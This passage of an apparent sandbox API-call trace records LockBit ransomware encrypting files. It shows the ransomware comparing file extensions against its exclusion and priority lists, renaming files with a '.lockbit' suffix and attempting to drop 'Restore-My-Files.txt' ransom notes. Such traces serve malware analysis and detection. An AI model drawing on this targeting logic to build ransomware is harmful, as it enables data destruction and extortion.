(lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.657] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.657] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0138.657] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.658] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.658] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0138.658] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0138.662] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105294.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105294.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0138.662] malloc (_Size=0xa6) returned 0x77d7a8 [0138.662] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0138.663] free (_Block=0x77d7a8) [0138.663] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105294.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0138.663] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0138.663] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0138.663] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65e68d90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x18b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0105298.WMF", cAlternateFileName="")) returned 1 [0138.663] lstrcmpiW (lpString1=".", lpString2="J0105298.WMF") returned -1 [0138.663] lstrcmpiW (lpString1="..", lpString2="J0105298.WMF") returned -1 [0138.663] PathFindExtensionW (pszPath="J0105298.WMF") returned=".WMF" [0138.664] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0138.664] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0138.664] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0138.664] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0138.664] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0138.664] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0138.664] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0138.664] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0138.664] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0138.664] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0138.664] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0138.664] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0138.664] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0138.664] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0138.664] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0138.664] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0138.664] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0138.664] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0138.664] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0138.664] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0138.664] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0138.664] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0138.665] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0138.665] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0138.665] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.665] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0138.665] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0138.665] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0138.665] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0138.665] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0138.665] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0138.665] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0138.665] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0138.665] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0138.665] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0138.665] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0138.665] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0138.665] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0138.665] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0138.665] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0138.665] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0138.665] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0138.665] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.665] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0138.666] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0138.666] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0138.666] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0138.666] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0105298.WMF") returned 1 [0138.666] lstrcmpiW (lpString1="ntldr", lpString2="J0105298.WMF") returned 1 [0138.666] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0105298.WMF") returned 1 [0138.666] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0105298.WMF") returned -1 [0138.666] lstrcmpiW (lpString1="autorun.inf", lpString2="J0105298.WMF") returned -1 [0138.666] lstrcmpiW (lpString1="thumbs.db", lpString2="J0105298.WMF") returned 1 [0138.666] lstrcmpiW (lpString1="iconcache.db", lpString2="J0105298.WMF") returned -1 [0138.666] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0138.666] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105298.WMF") returned=".WMF" [0138.666] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0138.666] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0138.666] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0138.666] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0138.666] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0138.666] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0138.666] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0138.666] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0138.666] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0138.666] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0138.667] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0138.667] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0138.667] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0138.667] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0138.667] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0138.667] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0138.667] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0138.667] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0138.667] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0138.667] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0138.667] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0138.667] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0138.667] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0138.667] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0138.667] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0138.667] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0138.667] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0138.667] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0138.667] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105298.WMF.lockbit") returned 72 [0138.667] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105298.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105298.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0138.671] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0138.672] malloc (_Size=0x40068) returned 0x3e70008 [0138.672] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=6320) returned 1 [0138.672] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.672] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.672] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0138.672] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.672] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.672] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0138.672] ReadFile (in: hFile=0xec, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0138.675] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105298.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105298.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0138.675] malloc (_Size=0xa6) returned 0x77d7a8 [0138.675] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0138.676] free (_Block=0x77d7a8) [0138.676] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105298.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0138.676] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0138.676] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0138.676] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65e68d90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x10e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0105306.WMF", cAlternateFileName="")) returned 1 [0138.676] lstrcmpiW (lpString1=".", lpString2="J0105306.WMF") returned -1 [0138.676] lstrcmpiW (lpString1="..", lpString2="J0105306.WMF") returned -1 [0138.676] PathFindExtensionW (pszPath="J0105306.WMF") returned=".WMF" [0138.676] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0138.677] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0138.677] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0138.677] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0138.677] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0138.677] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0138.677] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0138.677] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0138.677] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0138.677] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0138.677] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0138.677] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0138.677] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0138.677] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0138.677] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0138.677] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0138.677] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0138.677] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0138.677] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0138.677] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0138.677] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0138.677] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0138.677] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0138.677] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0138.677] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.678] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0138.678] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0138.678] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0138.678] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0138.678] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0138.678] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0138.678] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0138.678] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0138.678] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0138.678] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0138.678] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0138.678] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0138.678] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0138.678] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0138.678] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0138.678] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0138.678] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0138.678] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.678] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0138.678] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0138.678] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0138.678] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0138.678] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0105306.WMF") returned 1 [0138.678] lstrcmpiW (lpString1="ntldr", lpString2="J0105306.WMF") returned 1 [0138.678] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0105306.WMF") returned 1 [0138.679] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0105306.WMF") returned -1 [0138.679] lstrcmpiW (lpString1="autorun.inf", lpString2="J0105306.WMF") returned -1 [0138.679] lstrcmpiW (lpString1="thumbs.db", lpString2="J0105306.WMF") returned 1 [0138.679] lstrcmpiW (lpString1="iconcache.db", lpString2="J0105306.WMF") returned -1 [0138.679] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0138.679] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105306.WMF") returned=".WMF" [0138.679] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0138.679] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0138.679] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0138.679] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0138.679] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0138.679] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0138.679] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0138.679] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0138.679] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0138.679] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0138.679] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0138.679] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0138.679] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0138.679] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0138.679] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0138.679] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0138.679] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0138.679] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0138.680] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0138.680] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0138.680] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0138.680] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0138.680] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0138.680] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0138.680] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0138.680] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0138.680] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0138.680] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0138.680] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105306.WMF.lockbit") returned 72 [0138.680] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105306.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105306.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0138.681] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0138.681] malloc (_Size=0x40068) returned 0x3ef0008 [0138.681] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=4320) returned 1 [0138.681] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.681] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.681] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0138.681] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.682] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.682] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0138.682] ReadFile (in: hFile=0x170, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0138.686] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105306.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105306.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0138.686] malloc (_Size=0xa6) returned 0x77d7a8 [0138.686] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0138.693] free (_Block=0x77d7a8) [0138.693] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105306.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0138.693] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0138.693] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0138.693] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56347c90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x7e4, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0105320.WMF", cAlternateFileName="")) returned 1 [0138.693] lstrcmpiW (lpString1=".", lpString2="J0105320.WMF") returned -1 [0138.693] lstrcmpiW (lpString1="..", lpString2="J0105320.WMF") returned -1 [0138.693] PathFindExtensionW (pszPath="J0105320.WMF") returned=".WMF" [0138.693] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0138.693] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0138.693] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0138.693] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0138.693] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0138.693] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0138.693] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0138.693] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0138.693] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0138.693] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0138.694] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0138.694] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0138.694] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0138.694] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0138.694] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0138.694] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0138.694] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0138.694] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0138.694] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0138.694] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0138.694] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0138.694] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0138.694] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0138.694] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0138.694] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.694] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0138.694] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0138.694] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0138.694] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0138.694] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0138.694] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0138.694] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0138.695] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0138.695] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0138.695] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0138.695] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0138.695] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0138.695] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0138.695] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0138.695] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0138.695] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0138.695] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0138.695] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.695] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0138.695] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0138.695] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0138.695] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0138.695] lstrcmpiW 